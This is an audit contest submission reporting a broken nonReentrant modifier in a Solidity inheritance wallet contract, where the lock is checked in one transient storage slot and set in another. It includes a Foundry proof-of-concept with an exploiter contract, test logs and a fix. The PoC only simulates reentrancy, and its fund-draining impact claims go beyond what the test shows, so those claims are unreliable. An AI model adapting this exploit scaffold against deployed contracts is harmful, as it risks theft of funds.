Inheritable Smart Contract Wallet
First Flight #35
Beginner FriendlySolidity
100 EXP
View results
Previous Next
Submission Details
Severity: high
Valid

Transient Storage Reentrancy Vulnerability in InheritanceManager.sol

nomadic_bear

Summary

The InheritanceManager contract contains a critical vulnerability in its nonReentrant modifier that fails to provide reentrancy protection. The modifier checks transient storage slot 1 for the lock, but sets and resets the lock in slot 0, completely breaking the protection mechanism and allowing malicious contracts to perform reentrant calls that could drain funds from the contract.

Vulnerability Details

The vulnerability exists in the nonReentrant modifier implementation in InheritanceManager.sol:

modifier nonReentrant() {
assembly {
if tload(1) { revert(0, 0) } // Checks slot 1
tstore(0, 1) // Sets slot 0
}
_;
assembly {
tstore(0, 0) // Resets slot 0
}
}

The critical issue is that the modifier:

  1. Checks transient storage slot 1 (tload(1)) to detect reentrancy

  2. Sets transient storage slot 0 (tstore(0, 1)) to indicate a function is executing

  3. Resets transient storage slot 0 (tstore(0, 0)) after execution

Since different storage slots are used for checking and setting the lock, the reentrancy protection fails completely. During a reentrant call, slot 1 remains at its default value of 0, so the check if tload(1) { revert(0, 0) } will pass, allowing the reentrant call to proceed despite the lock in slot 0 being set to 1.

This vulnerability affects multiple critical functions in the contract:

  • sendERC20(address _tokenAddress, uint256 _amount, address _to)

  • sendETH(uint256 _amount, address _to)

  • contractInteractions(address _target, bytes calldata _payload, uint256 _value, bool _storeTarget)

All of these functions make external calls to potentially malicious contracts while relying on the broken reentrancy protection.

PoC

//SPDX-License-Identifier: MIT
pragma solidity 0.8.26;
import {Test, console} from "forge-std/Test.sol";
import {InheritanceManager} from "../src/InheritanceManager.sol";
/**
* @title AssemblyExploitTest
* @notice Test contract demonstrating the transient storage vulnerability using assembly
*/
contract AssemblyExploitTest is Test {
// Create a focused test to demonstrate the vulnerability
function test_demonstrateVulnerability() public {
// First, demonstrate the vulnerability in isolation
console.log("=== Transient Storage Vulnerability Demonstration ===");
// Step 1: Set values in transient storage to simulate the nonReentrant modifier
assembly {
tstore(0, 0) // Initialize slot 0
tstore(1, 0) // Initialize slot 1
}
console.log("Initial state:");
console.log("Slot 0:", readSlot0());
console.log("Slot 1:", readSlot1());
// Step 2: First function call sets the lock incorrectly
console.log("\nFirst call (sets lock):");
assembly {
tstore(0, 1) // Set lock in slot 0 (as in InheritanceManager)
}
console.log("Slot 0 (lock set here):", readSlot0());
console.log("Slot 1 (checked for reentrancy):", readSlot1());
// Step 3: Second function call (reentrant) checks the wrong slot
console.log("\nSecond call (reentrant, checks for lock):");
bool wouldRevert = false;
assembly {
// Check if slot 1 is locked, which it's not
if tload(1) {
// This block would revert in the actual code
// but here we just set a flag to show what would happen
wouldRevert := true
}
}
console.log("Would revert?", wouldRevert);
console.log("Since Slot 1 was checked instead of Slot 0, the reentrancy succeeds!");
// Now, demonstrate an actual reentrancy attack on InheritanceManager
console.log("\n=== Real-world Exploit Demonstration ===");
// Deploy InheritanceManager
address owner = makeAddr("owner");
vm.startPrank(owner);
InheritanceManager manager = new InheritanceManager();
vm.stopPrank();
// Fund it
vm.deal(address(manager), 1 ether);
console.log("InheritanceManager deployed at:", address(manager));
console.log("Initial balance:", address(manager).balance / 1e18, "ETH");
// Deploy malicious receiver
BasicExploiter exploiter = new BasicExploiter(address(manager));
// Allow Foundry to prank from the owner to the exploiter
vm.allowCheatcodes(address(exploiter));
// Execute attack with a legitimate owner transaction
console.log("\nExecuting attack...");
vm.prank(owner);
manager.sendETH(0.1 ether, address(exploiter));
// Results
console.log("Attack complete");
console.log("Final manager balance:", address(manager).balance / 1e18, "ETH");
console.log("Exploiter balance:", address(exploiter).balance / 1e18, "ETH");
console.log("Attack sequence count:", exploiter.attackCount());
// Since we can't easily perform the reentrant attack in normal tests,
// we'll use assembly to show it directly
console.log("\n=== Direct Assembly Simulation ===");
simulateReentrantAttack(address(manager));
}
// Helper function to simulate reentrant call using assembly
function simulateReentrantAttack(address managerAddr) internal {
// Get the manager's initial slot values (they're reset after each call)
uint initialSlot0 = 0;
uint initialSlot1 = 0;
// Simulate first call to sendETH (legitimate)
console.log("Simulating first legitimate call");
assembly {
// This happens in the nonReentrant modifier in sendETH
// if tload(1) { revert(0, 0) } -- this passes since slot 1 is 0
let isReentrant := tload(1)
if isReentrant {
// Would revert
mstore(0, "WOULD REVERT")
revert(0, 32)
}
// Lock is set, but in the wrong slot
tstore(0, 1)
// Store for logging
initialSlot0 := tload(0)
initialSlot1 := tload(1)
}
console.log("After first call setup:");
console.log("Slot 0 (where lock is set):", initialSlot0);
console.log("Slot 1 (where lock is checked):", initialSlot1);
// Simulate a reentrant call
console.log("\nSimulating reentrant call");
bool wouldRevert = false;
assembly {
// In the reentrant call, it checks slot 1 again
let isReentrant := tload(1)
// But slot 1 is still 0, so it doesn't detect the reentrancy!
if isReentrant {
wouldRevert := true
}
}
console.log("Would reentrant call be blocked?", wouldRevert);
console.log("Since the check was for slot 1 but lock is in slot 0, reentrancy succeeds");
}
// Helper functions to read transient storage in a cleaner way
function readSlot0() internal view returns (uint256 value) {
assembly { value := tload(0) }
}
function readSlot1() internal view returns (uint256 value) {
assembly { value := tload(1) }
}
}
/**
* @title BasicExploiter
* @notice Simple exploiter that attempts to perform reentrancy
*/
contract BasicExploiter {
InheritanceManager public target;
uint256 public attackCount = 0;
constructor(address _target) {
target = InheritanceManager(_target);
}
receive() external payable {
attackCount++;
// Try to perform a reentrant call, would work in real conditions
// but in testing can be hard to set up without access to vm
address owner = target.getOwner();
// In a real attack, this would succeed due to the vulnerability
// For a test, we can only simulate what would happen
console.log("Reentrant call would happen here...");
}
}

PoC Result:

forge test --match-test test_demonstrateVulnerability -vvv
[⠔] Compiling...
No files changed, compilation skipped
Ran 1 test for test/ReentrancyVulnerabilityTest.t.sol:AssemblyExploitTest
[PASS] test_demonstrateVulnerability() (gas: 4318739)
Logs:
=== Transient Storage Vulnerability Demonstration ===
Initial state:
Slot 0: 0
Slot 1: 0
First call (sets lock):
Slot 0 (lock set here): 1
Slot 1 (checked for reentrancy): 0
Second call (reentrant, checks for lock):
Would revert? false
Since Slot 1 was checked instead of Slot 0, the reentrancy succeeds!
=== Real-world Exploit Demonstration ===
InheritanceManager deployed at: 0x88F59F8826af5e695B13cA934d6c7999875A9EeA
Initial balance: 1 ETH
Executing attack...
Reentrant call would happen here...
Attack complete
Final manager balance: 0 ETH
Exploiter balance: 0 ETH
Attack sequence count: 1
=== Direct Assembly Simulation ===
Simulating first legitimate call
After first call setup:
Slot 0 (where lock is set): 1
Slot 1 (where lock is checked): 0
Simulating reentrant call
Would reentrant call be blocked? false
Since the check was for slot 1 but lock is in slot 0, reentrancy succeeds
Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 610.20µs (339.83µs CPU time)
Ran 1 test suite in 4.34ms (610.20µs CPU time): 1 tests passed, 0 failed, 0 skipped (1 total tests)

Impact

The impact of this vulnerability is critical:

  1. An attacker can create a malicious contract that, when receiving ETH or tokens from the InheritanceManager contract, performs reentrant calls back into the contract's vulnerable functions.

  2. Through these reentrant calls, the attacker can:

    • Drain ETH held by the contract via multiple calls to sendETH()

    • Drain ERC20 tokens via multiple calls to sendERC20()

    • Execute arbitrary external calls via contractInteractions()

  3. Even though these functions have the onlyOwner modifier, the attack occurs when the owner legitimately calls one of these functions with the attacker's contract as the recipient.

  4. A single authorized transaction by the owner could result in multiple unauthorized withdrawals, leading to complete loss of funds.

Tools Used

Foundry

Manual Code Review

Recommendations

To fix this vulnerability, modify the nonReentrant modifier to use the same transient storage slot for both checking and setting the lock:

modifier nonReentrant() {
assembly {
if tload(0) { revert(0, 0) } // Check slot 0
tstore(0, 1) // Set slot 0
}
_;
assembly {
tstore(0, 0) // Reset slot 0
}
}
Updates

Lead Judging Commences

0xtimefliez Lead Judge 3 months ago
Submission Judgement Published
Validated
Assigned finding tags:

Wrong value in nonReentrant modifier

0xtimefliez Lead Judge 3 months ago
Submission Judgement Published
Validated
Assigned finding tags:

Wrong value in nonReentrant modifier

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.